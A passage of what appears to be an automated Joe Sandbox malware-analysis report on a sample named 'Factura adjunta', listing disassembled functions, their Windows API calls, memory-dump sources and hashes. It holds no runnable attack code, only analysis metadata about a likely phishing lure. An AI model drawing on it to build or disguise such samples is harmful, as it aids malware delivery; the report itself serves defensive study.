                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                            • String ID:
                            • API String ID: 3902887630-0
                            • Opcode ID: d7699b0e6c9b09ac75e80eff6898ab43cdd392e95e3cea7244b845c5d0b83b12
                            • Instruction ID: edd8cf9379c9403f2a756e0c0b9084dac78bf2390772125979f612e7d0b2044d
                            • Opcode Fuzzy Hash: d7699b0e6c9b09ac75e80eff6898ab43cdd392e95e3cea7244b845c5d0b83b12
                            • Instruction Fuzzy Hash: 33210A31604204BBEB655B35DC49E7B7BA8EF95710F00402AF905CA2A1FB65CC4092A0
                            Function 0083B405 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • GetWindowLongW.USER32(?,000000F0), ref: 0083B44C
                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0083B471
                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0083B489
                            • GetSystemMetrics.USER32(00000004), ref: 0083B4B2
                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00821184,00000000), ref: 0083B4D0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Long$MetricsSystem
                            • String ID:
                            • API String ID: 2294984445-0
                            • Opcode ID: 5a7964aa3d1d0bb9dab44147d3a220d246eebf9d7fa6f543a8fefb7418334363
                            • Instruction ID: e2297ec950a49adff094e3e2f961263f0883964c5aa02f0465d094b261f7ec2f
                            • Opcode Fuzzy Hash: 5a7964aa3d1d0bb9dab44147d3a220d246eebf9d7fa6f543a8fefb7418334363
                            • Instruction Fuzzy Hash: CF2186B1910655AFCB149F38DC08B6537A4FB85725F144B38FA26D71E2E7309850DBD8
                            Function 008097E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00809802
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00809834
                            • __itow.LIBCMT ref: 0080984C
                            • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00809874
                            • __itow.LIBCMT ref: 00809885
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$__itow$_memmove
                            • String ID:
                            • API String ID: 2983881199-0
                            • Opcode ID: e9850a5bf72bc53d6c01c9e4ac6453cbac6f2cda57d52099b00c5e76e82b31ce
                            • Instruction ID: cc4a540506006d3d44bc9574d2dd3ca7790eb9f9a231f606557c17dd4e68f3ef
                            • Opcode Fuzzy Hash: e9850a5bf72bc53d6c01c9e4ac6453cbac6f2cda57d52099b00c5e76e82b31ce
                            • Instruction Fuzzy Hash: 1E216531A00208ABEB109A658C8AEEE7BA9FF49724F044035FA45DB392E6748D45D7D1
                            Function 007B12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007B134D
                            • SelectObject.GDI32(?,00000000), ref: 007B135C
                            • BeginPath.GDI32(?), ref: 007B1373
                            • SelectObject.GDI32(?,00000000), ref: 007B139C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ObjectSelect$BeginCreatePath
                            • String ID:
                            • API String ID: 3225163088-0
                            • Opcode ID: 34afee1e4523640e7b9c255de7e362a88cfdcc0b794c4648149c2e2ac75164c5
                            • Instruction ID: 1e6cb16f91309de2c6a08a65d966900035b8195340b9cfea02e02f06835538e6
                            • Opcode Fuzzy Hash: 34afee1e4523640e7b9c255de7e362a88cfdcc0b794c4648149c2e2ac75164c5
                            • Instruction Fuzzy Hash: 83218E70800A08EBDB108F69DC587A93BF8FB00321F984236F818975A5E375D8A5CF91
                            Function 0080C161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memcmp
                            • String ID:
                            • API String ID: 2931989736-0
                            • Opcode ID: d34d0534acc2a95c023625f1d73a270b7b57b6cae1dee082b626309b5915726f
                            • Instruction ID: b0ddffb87d440fc1a535522237d3f4e7d86a0e2d71550e2bb263438caaff5804
                            • Opcode Fuzzy Hash: d34d0534acc2a95c023625f1d73a270b7b57b6cae1dee082b626309b5915726f
                            • Instruction Fuzzy Hash: CB01847160810A7BD304AF215C46E6B775DFF213A8B844112FD14D63C3EA58DE15C2A0
                            Function 00814D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 00814D5C
                            • __beginthreadex.LIBCMT ref: 00814D7A
                            • MessageBoxW.USER32(?,?,?,?), ref: 00814D8F
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00814DA5
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00814DAC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                            • String ID:
                            • API String ID: 3824534824-0
                            • Opcode ID: eced0f7e794cf3ad608db8ccabb5f22ba3ac3d6ebb17a10b3fd313f19df2f539
                            • Instruction ID: 7361cfdc6cec0bee34a741fecc91c54c5658bc9d3e185a93fd7957d3d93ce653
                            • Opcode Fuzzy Hash: eced0f7e794cf3ad608db8ccabb5f22ba3ac3d6ebb17a10b3fd313f19df2f539
                            • Instruction Fuzzy Hash: FA110C72D04604BBCB119BA8EC08ADE7FACFF85324F144269F918D3352E675CD9487A0
                            Function 0080874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00808766
                            • GetLastError.KERNEL32(?,0080822A,?,?,?), ref: 00808770
                            • GetProcessHeap.KERNEL32(00000008,?,?,0080822A,?,?,?), ref: 0080877F
                            • RtlAllocateHeap.NTDLL(00000000,?,0080822A), ref: 00808786
                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0080879D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                            • String ID:
                            • API String ID: 883493501-0
                            • Opcode ID: d8ea87cf5e3599789ddc3fbcf8304aa28c4235996914b10bad5f112e3e05d3c2
                            • Instruction ID: 79aafc8253acedf33e91a370b49dae5a6ff462f62ba0fe7627a3b944f5a55535
                            • Opcode Fuzzy Hash: d8ea87cf5e3599789ddc3fbcf8304aa28c4235996914b10bad5f112e3e05d3c2
                            • Instruction Fuzzy Hash: 29016271601214FFEB105FA6DC48D6B7B6CFFC53557200439F949C2260DA318C40CAA0
                            Function 008154E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                            Download Yara Rule
                            APIs
                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00815502
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00815510
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00815518
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00815522
                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0081555E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: f8f1a995f7529efedbbac5c0148147c4fd854d7e04cfb33663061aefd49ebcfe
                            • Instruction ID: 8e2ccd0a3f09cc147c390702d37f9202aa75c709c9ec1c76560f937098526678
                            • Opcode Fuzzy Hash: f8f1a995f7529efedbbac5c0148147c4fd854d7e04cfb33663061aefd49ebcfe
                            • Instruction Fuzzy Hash: B6010935D11A1DDBCF00ABE9E8885EDBB7EFF89715F000456E901F2151DB34559487A1
                            Function 008085F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00808608
                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00808612
                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00808621
                            • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00808628
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0080863E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                            • String ID:
                            • API String ID: 47921759-0
                            • Opcode ID: d41b1af0b36af68efbdb1efe25a124ea5c0b29dbd70e3168ffa552e7a9aaa871
                            • Instruction ID: 9b6c3a0b6f0d22a2f8ad4ec61b8de82bcf2222add2b55149d4f386f1f06319ef
                            • Opcode Fuzzy Hash: d41b1af0b36af68efbdb1efe25a124ea5c0b29dbd70e3168ffa552e7a9aaa871
                            • Instruction Fuzzy Hash: F6F06231601204EFEB111FA5EC8DE6B3BACFF89764F000825FA85C61A1CB71DC85DAA0
                            Function 00808652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00808669
                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00808673
                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00808682
                            • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00808689
                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0080869F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                            • String ID:
                            • API String ID: 47921759-0
                            • Opcode ID: b6cc5015a0cc6aa0c24b78c3cbad930decff29246c81bfc9e24f1db3c2f53bd9
                            • Instruction ID: 7d4ce4659bb94e32ca31dfd5efa646916fdeb5b084a2664bbc65ed3520e17985
                            • Opcode Fuzzy Hash: b6cc5015a0cc6aa0c24b78c3cbad930decff29246c81bfc9e24f1db3c2f53bd9
                            • Instruction Fuzzy Hash: 15F04F71600204EFEB111FA5EC8CE6B3BACFF89754B100425FA95C61A1CB61D945DEA0
                            Function 0080C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetDlgItem.USER32(?,000003E9), ref: 0080C6BA
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0080C6D1
                            • MessageBeep.USER32(00000000), ref: 0080C6E9
                            • KillTimer.USER32(?,0000040A), ref: 0080C705
                            • EndDialog.USER32(?,00000001), ref: 0080C71F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                            • String ID:
                            • API String ID: 3741023627-0
                            • Opcode ID: a68d0441590caec3b14c2b8f2b50201623a8ad4a85e79290a82225fe87e0098f
                            • Instruction ID: 11036d678ae8bfa1c725db739a0495aa0fa5baa59df6cc98f3bcad4f7af64f70
                            • Opcode Fuzzy Hash: a68d0441590caec3b14c2b8f2b50201623a8ad4a85e79290a82225fe87e0098f
                            • Instruction Fuzzy Hash: A0018F30900708ABEB305F24DD4EB9677B8FF10705F000A69B642E10E1EBE4A9548A80
                            Function 007B13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                            Download Yara Rule
                            APIs
                            • EndPath.GDI32(?), ref: 007B13BF
                            • StrokeAndFillPath.GDI32(?,?,007EBAD8,00000000,?), ref: 007B13DB
                            • SelectObject.GDI32(?,00000000), ref: 007B13EE
                            • DeleteObject.GDI32 ref: 007B1401
                            • StrokePath.GDI32(?), ref: 007B141C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Path$ObjectStroke$DeleteFillSelect
                            • String ID:
                            • API String ID: 2625713937-0
                            • Opcode ID: 80887f0ba821e508e662feac41c41e9cc1d3fc99f80eb22a52beadffe049c465
                            • Instruction ID: d65f07e7940f8140f392a82c5f6b47ae33793cb60afd08c4af2c453a3a4b2574
                            • Opcode Fuzzy Hash: 80887f0ba821e508e662feac41c41e9cc1d3fc99f80eb22a52beadffe049c465
                            • Instruction Fuzzy Hash: EFF01930000A48EBDB155F2AED5C7983FA4B742326F98C234E529490F6E73589A5DF61
                            Function 00808E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00808E7F
                            • CloseHandle.KERNEL32(?), ref: 00808E94
                            • CloseHandle.KERNEL32(?), ref: 00808E9C
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00808EA5
                            • HeapFree.KERNEL32(00000000), ref: 00808EAC
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                            • String ID:
                            • API String ID: 3751786701-0
                            • Opcode ID: a5c058504347c3c57bc57e4273fbdf8750f29364d8d645e60887954a48696a45
                            • Instruction ID: ff923ee3af25bef5a8f45304f237921c488d8498cbaab7d9c1e8f30babbc456d
                            • Opcode Fuzzy Hash: a5c058504347c3c57bc57e4273fbdf8750f29364d8d645e60887954a48696a45
                            • Instruction Fuzzy Hash: 56E0C236404001FBDA022FE2EC0CD0ABB69FBC9322B108A30F31981171CB329424DB90
                            Function 007C2E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007D0FF6: std::exception::exception.LIBCMT ref: 007D102C
                              • Part of subcall function 007D0FF6: __CxxThrowException@8.LIBCMT ref: 007D1041
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                              • Part of subcall function 007B7BB1: _memmove.LIBCMT ref: 007B7C0B
                            • __swprintf.LIBCMT ref: 007C302D
                            Strings
                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007C2EC6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                            • API String ID: 1943609520-557222456
                            • Opcode ID: c8cfc454f7b1b81258f5c8eaef9dbefb54dfd8a3832104bc29fd33d3108adca0
                            • Instruction ID: 31371c193a4b525da4d424ae3948a41c7ae14d64e41a2317251f7167d8d82e9e
                            • Opcode Fuzzy Hash: c8cfc454f7b1b81258f5c8eaef9dbefb54dfd8a3832104bc29fd33d3108adca0
                            • Instruction Fuzzy Hash: 51916D72108205DFC718EF24D889EAEBBF5EF85750F00491EF546972A1DA38EE44CB52
                            Function 007D524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                            Download Yara Rule
                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 007D52DD
                              • Part of subcall function 007E0340: __87except.LIBCMT ref: 007E037B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorHandling__87except__start
                            • String ID: pow
                            • API String ID: 2905807303-2276729525
                            • Opcode ID: 50df2113006f902b04a14e8f40d8a76b7a0e557189de3d0fb5f7b2266669052d
                            • Instruction ID: 217419891e2cb96f404e487b52b451cdd547d36fadc9a6e4e6c4397457674d75
                            • Opcode Fuzzy Hash: 50df2113006f902b04a14e8f40d8a76b7a0e557189de3d0fb5f7b2266669052d
                            • Instruction Fuzzy Hash: BA518D61A0EA81C7D7117715CA4137E2BA0BB46750F204D5AE0D5823EAEFBCCCD8DAC2
